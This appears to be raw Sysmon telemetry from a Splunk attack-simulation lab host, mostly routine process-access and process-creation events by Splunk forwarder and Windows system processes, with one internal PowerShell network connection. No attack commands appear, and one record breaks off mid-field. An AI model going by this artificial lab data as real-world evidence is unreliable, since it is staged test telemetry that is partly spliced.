13:11:37.879{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:37.879{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-9F89-6140-5656-04000000C801}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:37.878{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F89-6140-5656-04000000C801}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496331Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:37.858{B81B27B7-9F89-6140-5656-04000000C801}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496330Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:37.196{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AB4D86ACEA1664BD8E7671E8D555C75,SHA256=CA14662227DD0C16D8CD4885312F0700ACEC45B019CE77608B0C79B39E8A0DD7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:11:38.877{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7CF38580D836B52855E5B7088BA568F3,SHA256=1588BA5A98576072A656DCE07EB525E36D70BC3E71A6747518CDCF14261E7301,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.877{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=63BAAD576212EF1B67F6C699B83C66A2,SHA256=D1ECB69DE231408B9A26282A05A523048A97D81986DFAD696835DB6D17F830ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.557{B81B27B7-9F8A-6140-5756-04000000C801}36004544C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:11:38.410{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F8A-6140-5756-04000000C801}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.410{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:11:38.410{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.410{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:11:38.410{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.410{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-9F8A-6140-5756-04000000C801}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.410{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F8A-6140-5756-04000000C801}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.395{B81B27B7-9F8A-6140-5756-04000000C801}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.226{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9A6F0C8780F2E40226994E48DDA3F51,SHA256=7F1203D6B78E099CD5335E43649330A058DBF3C75466B4E836FA3F852E1AB877,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
10341000x800000000000000036496339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.026{B81B27B7-9F89-6140-5656-04000000C801}54804984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:39.977{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7CF38580D836B52855E5B7088BA568F3,SHA256=1588BA5A98576072A656DCE07EB525E36D70BC3E71A6747518CDCF14261E7301,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:09.921{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50400-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036496362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.822{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496412Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496411Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496410Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496409Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496408Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496407Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496406Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496405Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496404Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496403Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496402Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496401Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
